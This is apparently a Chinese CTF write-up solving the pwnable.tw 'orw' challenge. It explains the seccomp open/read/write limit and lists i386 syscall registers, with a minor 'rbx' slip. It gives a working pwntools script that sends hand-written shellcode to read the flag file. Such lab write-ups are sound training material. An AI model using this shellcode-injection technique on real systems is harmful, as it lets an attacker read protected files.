pwnable.tw-orw

checksec

啥都沒開(Canary實際上沒開),stack也可以執行

分析

給一個shellcode,然後會幫你執行,不過有seccomp,要ORW。

syscall table

https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit

syscall

sys_open

暫存器
eax 0x5
ebx filename位置的address
ecx 0
edx 0

sys_read

暫存器
eax 0x3
rbx fd文件描述符
ecx 可讀可寫的memory address
edx 讀取大小(size_t count)

sys_write

暫存器
eax 0x4
ebx fd文件描述符
ecx 可讀可寫的memory address
edx 讀取大小(size_t count)

script

直接寫asm就可以了

總之就直接上script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *

context(os='linux', arch='i386')

r = remote('chall.pwnable.tw', 10001)

sc = asm('\n\n'.join([
    'push %d' % u32('ag\0\0'),
    'push %d' % u32('w/fl'),
    'push %d' % u32('e/or'),
    'push %d' % u32('/hom'), 
    'xor edx, edx', 
    'xor ecx, ecx',
    'mov ebx, esp', 
    'mov eax, 5',
    'int 0x80',

    'mov edx, 128',
    'mov ecx, esp',
    'mov ebx, eax',
    'mov eax, 3',
    'int 0x80',

    'mov edx, eax', 
    'mov ecx, esp',
    'mov ebx, 0',
    'mov eax, 4',
    'int 0x80'
]))


r.sendline(sc)

r.interactive()